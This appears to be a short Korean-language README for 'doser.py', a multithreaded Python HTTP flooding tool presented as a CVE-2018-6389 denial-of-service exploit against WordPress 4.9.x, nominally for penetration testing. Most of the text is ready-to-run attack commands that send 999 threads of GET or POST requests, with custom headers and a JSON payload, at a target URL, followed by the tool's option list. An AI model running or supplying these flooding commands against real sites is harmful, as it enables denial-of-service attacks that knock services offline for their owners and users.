
Python 기반의 CVE-2018-6389 서비스 거부 익스플로잇으로 WordPress 4.9.x를 대상으로 합니다. 침투 테스트를 위해 사용자 정의 헤더 및 JSON 페이로드와 함께 멀티스레드 GET/POST 요청을 지원합니다.
Python으로 작성된 HTTP 요청용 DoS 도구 (hulk에서 영감을 받았지만 더 많은 기능을 갖춤):
999개의 스레드가 GET 요청을 보냅니다:
python doser.py -t 999 -g 'https://targeted.site.com'
999개의 스레드가 JSON 데이터를 포함한 POST 요청을 보냅니다:
python doser.py -t 999 -p 'https://targeted.site.com' -ah 'Content-Type: application/json' -d '{"json": "payload"}'
usage: doser.py [-h] [-g G] [-p P] [-d D] [-ah AH] [-t T]
선택적 인수:
-h, --help 도움말 메시지를 표시하고 종료합니다
-g GET 요청을 지정합니다. 사용법: -g '< url >'
-p POST 요청을 지정합니다. 사용법: -p '< url >'
-d POST 요청에 대한 데이터 페이로드를 지정합니다
-ah 추가 헤더를 지정합니다
-t 사용할 스레드 수를 지정합니다
Golang으로 다시 작성 :)